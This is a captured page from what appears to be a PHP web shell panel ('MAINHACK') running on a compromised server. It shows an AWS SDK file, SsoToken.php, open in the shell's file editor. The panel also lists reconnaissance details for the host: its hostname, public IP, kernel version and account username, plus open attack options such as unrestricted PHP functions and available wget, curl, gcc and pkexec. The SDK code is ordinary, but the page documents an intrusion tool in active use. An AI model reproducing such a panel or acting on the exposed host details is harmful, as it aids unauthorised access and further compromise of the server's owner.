[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: SsoToken.php
<?php namespace Aws\Token; /** * Token that comes from the SSO provider */ class SsoToken extends Token { private $refreshToken; private $clientId; private $clientSecret; private $registrationExpiresAt; private $region; private $startUrl; /** * Constructs a new SSO token object, with the specified AWS * token * * @param string $token Security token to use * @param int $expires UNIX timestamp for when the token expires * @param int $refreshToken An opaque string returned by the sso-oidc service * @param int $clientId The client ID generated when performing the registration portion of the OIDC authorization flow * @param int $clientSecret The client secret generated when performing the registration portion of the OIDC authorization flow * @param int $registrationExpiresAt The expiration time of the client registration (clientId and clientSecret) * @param int $region The configured sso_region for the profile that credentials are being resolved for * @param int $startUrl The configured sso_start_url for the profile that credentials are being resolved for */ public function __construct( $token, $expires, $refreshToken = null, $clientId = null, $clientSecret = null, $registrationExpiresAt = null, $region = null, $startUrl = null ) { parent::__construct($token, $expires); $this->refreshToken = $refreshToken; $this->clientId = $clientId; $this->clientSecret = $clientSecret; $this->registrationExpiresAt = $registrationExpiresAt; $this->region = $region; $this->startUrl = $startUrl; } /** * @return bool */ public function isExpired() { if (isset($this->registrationExpiresAt) && time() >= $this->registrationExpiresAt ) { return false; } return $this->expires !== null && time() >= $this->expires; } /** * @return string|null */ public function getRefreshToken() { return $this->refreshToken; } /** * @return string|null */ public function getClientId() { return $this->clientId; } /** * @return string|null */ public function getClientSecret() { return $this->clientSecret; } /** * @return int|null */ public function getRegistrationExpiresAt() { return $this->registrationExpiresAt; } /** * @return string|null */ public function getRegion() { return $this->region; } /** * @return string|null */ public function getStartUrl() { return $this->startUrl; } /** * Creates an instance of SsoToken from a token data. * * @param $tokenData * * @return SsoToken */ public static function fromTokenData($tokenData): SsoToken { return new SsoToken( $tokenData['accessToken'], \strtotime($tokenData['expiresAt']), isset($tokenData['refreshToken']) ? $tokenData['refreshToken'] : null, isset($tokenData['clientId']) ? $tokenData['clientId'] : null, isset($tokenData['clientSecret']) ? $tokenData['clientSecret'] : null, isset($tokenData['registrationExpiresAt']) ? $tokenData['registrationExpiresAt'] : null, isset($tokenData['region']) ? $tokenData['region'] : null, isset($tokenData['startUrl']) ? $tokenData['startUrl'] : null ); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002